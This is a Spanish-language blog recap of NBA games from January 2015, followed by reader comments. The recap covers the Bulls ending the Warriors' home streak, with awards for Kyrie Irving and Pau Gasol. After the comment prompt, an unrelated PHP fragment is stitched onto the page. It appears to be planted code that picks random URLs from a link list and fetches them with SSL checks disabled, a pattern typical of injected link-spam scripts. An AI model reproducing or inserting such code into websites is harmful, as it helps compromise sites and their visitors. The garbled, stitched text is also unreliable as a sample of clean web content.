La Crónica: La toma del ORACLE

28 de January de 2015 por txusma

Los más viejos del lugar casi ni se acordaban de cuando perdieron los Warriors su último partido en casa y es que la presión que ejercen los aficionados del ORACLE Arena vale casi por 10 puntos. Pero ayer llegaron los Bulls e hicieron saltar por los aires la racha de los locales. Ganaron también los Cavaliers (y van 7) y los Grizzlies, que asustan desde que volvió Zach Randolph y se hicieron con Jeff Green. En el Este, victorias de Wizards, Raptors y Bucks.

Una jornada de lo más entretenida.

klay_rose

Chicago Bulls 113 – Golden State Warriors 111

Han tenido que pasar más de 2 meses y 19 partidos para que los aficionados de los Warriors vivieran otra derrota de su equipo en su propia casa. Desde el pasado 11 de noviembre, cuando los Spurs se impusieron en el Oracle Arena, ningún equipo había sido capaz de imponerse a los pupilos de Steve Kerr. Tuvieron que llegar los Bulls y un inspirado Derrick Rose para romper la racha. Y eso que los locales dominaron todo el partido aunque en ningún momento fueron capaces de escaparse en el marcador. Cada vez que la ventaja parecía dispararse, Pau Gasol (enorme partido) y los suyos apretaban los dientes y devolvían la igualdad en el marcador. De hecho, fueron los Warriors los que tuvieron que forzar la prórroga con un palmeo de Draymond Green a falta de un 1 segundo para el final. Sin embargo,seguramente todos los presentes apostaban por la victoria local gracias al empuje de los más de 19.000 aficionados que abarrotaban el ORACLE pero los Bulls no se arredraron y un canastón de Derrick Rose sobre Klay Thompson en un aclarado de manual acabó certificando la victoria visitante.

Memphis Grizzlies 109 – Dallas Mavericks 90

El partido de ayer de los Grizzlies no fue un golpe sobre la mesa, fue un auténtico destrozo, un aviso para navegantes de los 7 mares. A la chita callando y con un Zach Randolph impresionante desde que volvió de la lesión, los de Memphis certifican su segundo puesto en la conferencia y encadenan 4 victorias consecutivas. Dominaron a los Mavericks en su propia casa de principio a fin y cuando éstos amenazaron con remontar en el tercer cuarto, Randolph anotó una serie de lanzamientos con el defensor encima dignos de guardar en las videotecas. Ahora Randolph, ahora Marc, ahora el banquillo… Los Grizzlies disponen de un compendio de armas muy difícil de parar en estos momentos.

Cleveland Cavaliers 103 – Detroit Pistons 95

Séptima victoria seguida de los Cleveland Cavaliers, que les encara hacia las primeras posiciones de la conferencia Este. Todavía hay que recuperar 4 partidos pero parece que las incorporaciones de Mozgov, Smith (aunque ayer no jugó muy bien que digamos) y Shumpert han supuesto una auténtica mejora para el equipo. Kyrie Irving y LeBron James se combinaron para anotar 70 puntos y acabaron con la resistencia de los Pistons, que en ningún momento dieron su brazo a torcer. Desgraciadamente, el cuento de hadas de Detroit parece haberse esfumado con la lesión de Brandon Jennings. Ya van 3 derrotas seguidas.

El resto de la jornada

Duelo directo entre dos equipos que pelean por la 6ª posición de la conferencia Este. El partido suposo la tercera victoria de los Bucks sobre los Heat esta temporada, gracias a su juego coral, y una nueva lesión para Dwyane Wade, que se tuvo que retirar en el tercer cuarto. Los Raptors, por su parte, aguantan la tercera posición del Este con su victoria sobre los Pacers a pesar de empezar el partido muy dormidos. Están justo detrás de los Wizards, que superaron con ciertos problemas el trámite que supone enfrentarse en estos momentos a los Lakers. El mejor de los locales fue Wayne Ellington con 28 puntos. No digo más.

PREMIOS

MVP: Tremendo partido de Kyrie Irving, autor de 38 puntos (con un 6 de 10 en TC), 6 asistencias y 3 robos. Para enmarcar también los 18 puntos, 16 rebotes, 8 asistencias y 4 tapones de Pau Gasol, clave en la victoria de los suyos ante los Warriors en su propia casa.

Rookie: Jordan Clarkson ejerce de titular en los Lakers y se toma toda la confianza del mundo para tirar cuando haga falta. 18 puntos con un 8 de 18 en TC, 3 rebotes y 3asistencias.

Sorpresa: Como hemos comentado anteriormente, 28 puntos de Wayne Ellington con un 12 de 20 en TC. Seguramente le veremos alguna vez más por aquí esta temporada.

Decepción: Veníamos comentado lo bien que le había sentado a los Cavs la incorporación de JR Smith, y éste va y se marca un 2 de 11. Su compañero Kevin Love tampoco estuvo muy acertado de cara a canasta. 3 de 11 y 1 de 8 en T3.

Esfuerzo en vano: Klay Thompson anotó 30 puntos y capturó 10 rebotes ante los Bulls y su compañero David Lee se fue a los 24 puntos, 9 rebotes y 6 asistencias pero no fue suficiente para alargar la racha de los Warriors en casa.

TOP-10:

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Schize dice:
    #1

    Hay un pequeño error en el MVP: 4 tapones de Pau, no rebotes.
    Por otra parte, habiendo visto el resumen del partido y los 13/33 en TC y 11 pérdidas de Rose (podría ser incluso récord de franquicia, ¿no?) y una sola asistencia, tampoco me parece muy inspirado. Por poner un ejemplo, Pau y Mirotic anotaron los mismos puntos que Rose en ¡15! lanzamientos menos

      Citar

  2. MagicJohnson32 dice:
    #2

    Schize:
    Hay un pequeño error en el MVP: 4 tapones de Pau, no rebotes.
    Por otra parte, habiendo visto el resumen del partido y los 13/33 en TC y 11 pérdidas de Rose (podría ser incluso récord de franquicia, ¿no?) y una sola asistencia, tampoco me parece muy inspirado. Por poner un ejemplo, Pau y Mirotic anotaron los mismos puntos que Rose en ¡15! lanzamientos menos

    Corregido lo de los tapones de Pau ¡gracias!

    En cuanto a lo otro, creo que se refiere a que fue un momento de inspiración de Rose lo que acabó tumbando a los Warriors. De hecho, en el MVP nombra a Pau y no a Rose…

      Citar

  3. jhc dice:
    #3

    Derrick Rose ese prodigio baloncestistico que no sabe que cuando la pelota no entra es mejor dejar a los demas que sean los que tiren

      Citar

  4. luismi_vallecas dice:
    #4

    Por cada partido que pasa los Bulls me parecen menos candidatos, creo que hay equipos en el Este mejor que ellos. No me dan nada de seguridad, en un partido juegan genial y arrasan en una cancha rival difícil y al día siguiente se les comen en su propia casa. Hasta ahora, juegan a rachas de Rose, Butler o Gasol

      Citar

  5. jhc dice:
    #5

    luismi_vallecas:
    Por cada partido que pasa los Bulls me parecen menos candidatos, creo que hay equipos en el Este mejor que ellos. No me dan nada de seguridad, en un partido juegan genial y arrasan en una cancha rival difícil y al día siguiente se les comen en su propia casa. Hasta ahora, juegan a rachas de Rose, Butler o Gasol

    Juegan al tran tran pero cuando llegue play-offs con las pilas puestas….

    mira cleveland en cuanto lebron ha dicho vamos a dejarnos de rolllos

      Citar

  6. Azabel dice:
    #6

    55 puntitos de Irving para la octava victoria consecutiva de los Cavs hoy sin Lebron frente a Portland, madre mia!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>